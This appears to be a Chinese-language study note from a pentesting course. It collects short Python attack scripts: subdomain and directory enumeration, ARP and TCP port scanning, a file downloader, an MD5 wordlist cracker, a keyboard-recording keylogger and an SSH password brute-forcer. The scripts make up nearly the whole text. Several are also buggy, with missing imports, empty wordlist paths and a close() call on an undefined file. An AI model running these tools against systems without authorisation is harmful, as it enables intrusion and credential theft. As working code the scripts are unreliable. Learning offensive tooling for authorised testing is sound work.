Python for Pentesters
还记得开始学习编程的C,虽然淡忘,但思想仍在。
子域名枚举
request库
import paramiko
import requests
import sys
ascii_banner = pyfiglet.figlet_format("ABC-L")
print(ascii_banner)
dir_path = ""
sub_list = open(dir_path, "r").read()
subdoms = sub_list.splitlines()
for sub in subdoms:
sub_domains = f"http://{sub}.{sys.argv[1]}"
try:
requests.get(sub_domains)
except requests.ConnectionError:
pass
else:
print("Valid domain: ",sub_domains)
目录枚举
还是requests
import requests
import sys
import paramiko
ascii_banner = pyfiglet.figlet_format("ABC-L")
print(ascii_banner)
path = ''
sub_list = open(path,'r').read()
directories = sub_list.splitlines()
for dir in directories:
dir_enum = f"http://{sys.argv[1]}/{dir}"
r = requests.get(dir_enum)
if r.status_code==404:
pass
else:
print("Valid directory:" ,dir_enum)
网络扫描
from scapy.all import *
import paramiko
ascii_banner = pyfiglet.figlet_format("ABC-L")
print(ascii_banner)
interface = "eth0"
ip_range = "10.10.X.X/24"
broadcastMac = "ff:ff:ff:ff:ff:ff"
packet = Ether(dst=broadcastMac)/ARP(pdst = ip_range)
ans, unans = srp(packet, timeout =2, iface=interface, inter=0.1)
for send,receive in ans:
print (receive.sprintf(r"%Ether.src% - %ARP.psrc%"))
端口扫描
socket编程https://www.cnblogs.com/-Lucky-/p/17039661.html
import sys
import socket
import pyfiglet
ascii_banner = pyfiglet.figlet_format("ABC-L")
print(ascii_banner)
ip = sys.argv[1]
open_ports =[]
ports = range(1, 65535)
def probe_port(ip, port):
result = 1
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.5)
r = sock.connect_ex((ip, port))
if r == 0:
result = r
sock.close()
except Exception as e:
pass
return result
for port in ports:
sys.stdout.flush()
response = probe_port(ip, port)
if response == 0:
open_ports.append(port)
print(f"Open Ports:{open_ports}")
文件下载器
Linux 系统上的 Wget 或 Windows 上的 Certutil 是下载文件的有用工具。
import requests
url = 'https://assets.tryhackme.com/img/THMlogo.png'
r = requests.get(url, allow_redirects=True)
open('THMlogo.png', 'wb').write(r.content)
import requests
url = 'https://download.sysinternals.com/files/PSTools.zip'
r = requests.get(url, allow_redirects=True)
open('PSTools.zip', 'wb').write(r.content)
hash破解
tools:john,hashcat
import hashlib
import pyfiglet
ascii_banner = pyfiglet.figlet_format("ABC-L")
print(ascii_banner)
wordlist_location = str(input('Enter wordlist file location: '))
hash_input = str(input('Enter hash to be cracked: '))
with open(wordlist_location, 'r') as file:
for line in file.readlines():
print(line)
hash_ob = hashlib.md5(line.strip().encode())
hashed_pass = hash_ob.hexdigest()
if hashed_pass == hash_input:
print('Found cleartext password! ' + line.strip())
exit(0)
键盘记录器
import keyboard
keys = keyboard.record(until ='ENTER')
keyboard.play(keys)
ssh暴力破解
tools:hydra
import paramiko
import sys
import os
target = str(input('Please enter target IP address: '))
username = str(input('Please enter username to bruteforce: '))
password_file = str(input('Please enter location of the password file: '))
def ssh_connect(password, code=0):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(target, port=22, username=username, password=password)
except paramiko.AuthenticationException:
code = 1
ssh.close()
return code
with open(password_file, 'r') as file:
for line in file.readlines():
password = line.strip()
try:
response = ssh_connect(password)
if response == 0:
print('password found: '+ password)
exit(0)
elif response == 1:
print('no luck')
except Exception as e:
print(e)
pass
input_file.close()